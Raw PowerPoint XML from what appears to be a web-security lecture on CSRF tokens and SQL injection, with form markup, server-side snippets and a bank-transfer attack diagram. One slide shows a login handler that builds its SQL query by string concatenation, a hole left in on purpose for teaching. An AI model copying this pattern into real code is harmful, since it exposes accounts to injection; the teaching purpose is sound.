                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>br</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>        To: &lt;input type="text"   name="to"&gt;     &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>br</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    Amount: &lt;input type="text"   name="amount"&gt; &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>br</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>            &lt;input type="hidden" name="token" value="`+token+`"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>            &lt;input type="submit" value="Transfer!"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   &lt;/form&gt;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269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CSRF</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12D5E3EE-389A-49A9-A2E6-810D6FCD0B9C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1569506"/>
            <a:ext cx="10515600" cy="2570191"/>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solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>app.post</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>('/transfer',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err="1">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token = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>request.body.token</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRP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a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/* token is equal to the token we generated before */</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i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>// Authorize the request.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D62967E2-3FEE-49DB-9969-A0870A459A99}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="4318454"/>
            <a:ext cx="9717158" cy="1512209"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>How can we remember which token we generated before?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Store it in the user's session.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Store it in a cookie.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="156748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A19EE4E0-8DE0-485E-A46D-7FEA457ECEEF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="814574" y="3657029"/>
            <a:ext cx="10515600" cy="254428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app.post</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>('/login', </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username = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>request.body.username</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password = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>request.body.password</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query = `SELECT id FROM accounts WHERE</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username = "`+username+'" AND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password = "`+password+`"`</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noProof="0" dirty="0"/>
              <a:t>#1 Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1493476"/>
            <a:ext cx="10515600" cy="1997983"/>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Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;form method="post" action="/login"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  Username: &lt;input type="text" name="username"&gt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>br</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Password: &lt;input type="password" name="password"&gt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>br</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&lt;input type="submit" value="Sign in!"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;/form&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="13" name="Group 12"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7958927" y="2675030"/>
            <a:ext cx="3635829" cy="1632858"/>
            <a:chOff x="6934200" y="1926771"/>
            <a:chExt cx="3788229" cy="2329543"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="Rounded Rectangle 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6934200" y="1926771"/>
              <a:ext cx="3788229" cy="23295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7209871" y="2094396"/>
              <a:ext cx="3236885" cy="461665"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0">
                  <a:latin typeface="Georgia" panose="02040502050405020303" pitchFamily="18" charset="0"/>
                  <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Sign in</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="TextBox 7"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7108371" y="2631279"/>
              <a:ext cx="1368364" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" dirty="0">
                  <a:latin typeface="Georgia" panose="02040502050405020303" pitchFamily="18" charset="0"/>
                  <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Username:</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="TextBox 8"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7108371" y="3075829"/>
              <a:ext cx="1368364" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" dirty="0">
                  <a:latin typeface="Georgia" panose="02040502050405020303" pitchFamily="18" charset="0"/>
                  <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Password:</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Rectangle 9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8591280" y="2631279"/>
              <a:ext cx="18263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Lars</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="Rectangle 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8591280" y="3089129"/>
              <a:ext cx="18388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pa55w0rd</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="Rounded Rectangle 11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9001703" y="3589365"/>
              <a:ext cx="1343552" cy="49094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Georgia" panose="02040502050405020303" pitchFamily="18" charset="0"/>
                  <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Sign in!</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Rounded Rectangle 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3348921" y="5713162"/>
            <a:ext cx="5021641" cy="112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2000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>SELECT id FROM accounts WHERE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>username = "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Lars</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>" AND</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>password = "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pa55w0rd</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649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4" grpId="0" uiExpand="1" build="p"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Preventing CSRF</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Graphic 5" descr="Computer">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DBCE107A-367E-4A91-B795-E8AB39C6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1365" y="1252071"/>
            <a:ext cx="1372107" cy="1373793"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{364EAECD-4B29-4766-9148-33F2CC83ACAE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9837445" y="1493382"/>
            <a:ext cx="442249" cy="856306"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C577EFEA-BBCE-4D19-A16A-91755058A587}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4857318" y="2394213"/>
            <a:ext cx="1600200" cy="424732"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" noProof="0" dirty="0"/>
              <a:t>User</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0B96A42-9C17-4E25-8524-23782D6448CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9144138" y="2315158"/>
            <a:ext cx="1828862"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Bank Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="12" name="Straight Connector 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F445CD2-8DBF-4034-A1A1-3192CF296F7A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5657418" y="2818945"/>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D0E7786C-A90E-4105-9846-FBFFB54AD2B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="10058569" y="2818945"/>
            <a:ext cx="1" cy="3333535"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:style>
          <a:lnRef idx="3">
            <a:schemeClr val="accent4"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent4"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="accent4"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21" name="Picture 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25E25A37-7A9A-4A44-88DF-CB64CA49AE83}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1219000" y="1493382"/>
            <a:ext cx="442249" cy="856306"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="23" name="Straight Connector 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30805EEB-2ABF-4B8E-8356-E2FBCCAD9AB0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1440124" y="2818945"/>
            <a:ext cx="1" cy="3333535"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:style>
          <a:lnRef idx="3">
            <a:schemeClr val="accent4"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent4"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="accent4"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ABC3E942-27B2-4137-865F-2711072EE5D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="411648" y="2349688"/>
            <a:ext cx="2056953"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Bad Website</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="28" name="Straight Arrow Connector 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94361FBD-BEF1-4A65-A3AC-B83655902005}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5715015" y="2837345"/>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Content Placeholder 2">
            <a:extLst>
